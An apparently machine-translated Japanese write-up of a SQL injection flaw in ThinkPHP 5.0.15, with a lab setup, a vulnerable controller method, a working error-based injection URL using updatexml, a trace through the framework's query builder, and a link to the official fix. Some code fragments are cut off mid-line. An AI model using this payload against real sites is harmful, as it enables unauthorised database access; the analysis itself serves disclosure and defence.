ThinkPHP 5.0.xフレームワークsql注入ホール分析


前言
ThinkPHP 5.0.x 框架sql注入漏洞分析_第1张图片
脆弱性の再現
データベースを構築し、自分の構成を例に挙げます.データベースはtptest、テーブル名はuserで、フィールドidとusernameが2つあります.
ThinkPHP 5.0.x 框架sql注入漏洞分析_第2张图片
thinkphp公式サイトダウンロード5.0.15バージョン:http://www.thinkphp.cn/down/1125.html .データベース構成情報の変更php.アプリケーション/config.phpではデバッグとtraceが開き、app_debugapp_traceはtrueです.アプリケーション/index/controller/index.phpのIndexクラスにメソッドを追加するには、次の手順に従います.
public  function testsql()
    {
        $username = input('get.username/a');
        db('user')->where(['id'=> 1])->insert(['username'=>$username]);
    }

アクセス:
http://127.0.0.1/index.php/index/index/testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

ThinkPHP 5.0.x 框架sql注入漏洞分析_第3张图片
脆弱性分析
パラメータをinputで取得すると、username変数は次のようになります.
ThinkPHP 5.0.x 框架sql注入漏洞分析_第4张图片
insert,thinkphp/library/think/db/Query.に続くphp:2078
parseExpress();
    $data    = array_merge($options['data'], $data);
    ...

ThinkPHP 5.0.x 框架sql注入漏洞分析_第5张图片
次に実行します.
builder->insert($data, $options, $replace);

thinkphp/library/think/db/Builderにフォローphp:720:
parseData($data, $options);
        if (empty($data)) {
            return 0;
        }
        ...
parseDatathinkphp/library/think/db/Builder.へphp:101、関連変数情報はコメントで追加されました.
 $val) { //   101    
    //  $key : "username"
    //  $val : {"inc","updatexml(1,concat(0x7,user(),0x7e),1)","1"}
        $item = $this->parseKey($key, $options);
        if (is_object($val) && method_exists($val, '__toString')) {
            ....
        }
        if (false === strpos($key, '.') && !in_array($key, $fields, true)) {
            ...
        } elseif (is_null($val)) {
            ...
        } elseif (is_array($val) && !empty($val)) {
            // $val[0] = "inc"
            switch ($val[0]) {
                case 'exp':
                    $result[$item] = $val[1];
                    break;
                case 'inc':
                    $result[$item] = $this->parseKey($val[1]) . '+' . floatval($val[2]);
                    break;
                case 'dec':
                    $result[$item] = $this->parseKey($val[1]) . '-' . floatval($val[2]);
                    break;
            }
        }
     ...
    }
    return $result;
$valは配列であり、$val[0]の値がincであることから、switch文を介して次のようになります.
parseKey($val[1]) . '+' . floatval($val[2]);
        break;

ここに続くparseKeyすなわちthinkphp/library/think/db/builder/Mysql.php:90
query->getTable();
            }
            if (isset($options['alias'][$table])) {
                $table = $options['alias'][$table];
            }
        }
        if (!preg_match('/[,\'\"\*\(\)`.\s]/', $key)) {
            $key = '`' . $key . '`';
        }
        if (isset($table)) {
            if (strpos($table, '.')) {
                $table = str_replace('.', '`.`', $table);
            }
            $key = '`' . $table . '`.' . $key;
        }
        return $key; // $key : "updatexml(1,concat(0x7,user(),0x7e),1)"
    }

ここでは、入力された$keyのフィルタリングおよびチェックは行われず、最後に返されたのは1 and (updatexml(1,concat(0x7,user(),0x7e),1))である.parseDataに戻り、floatval($val[2])は1を返します.これも私たちがusername[2]=1に伝える理由です.前に経過したparseKeyの結果とつなぎ合わせてresultに戻る
ThinkPHP 5.0.x 框架sql注入漏洞分析_第6张图片
thinkphp/library/think/db/Queryに戻ります.phのinsertでは、
ThinkPHP 5.0.x 框架sql注入漏洞分析_第7张图片
sql注入に成功した.
脆弱性の修復
公式commit:https://github.com/top-think/framework/commit/363fd4d90312f2cfa427535b7ea01a097ca8db1b
ThinkPHP 5.0.x 框架sql注入漏洞分析_第8张图片 decおよびincの操作を行う前に$val[1]の値を再確認した.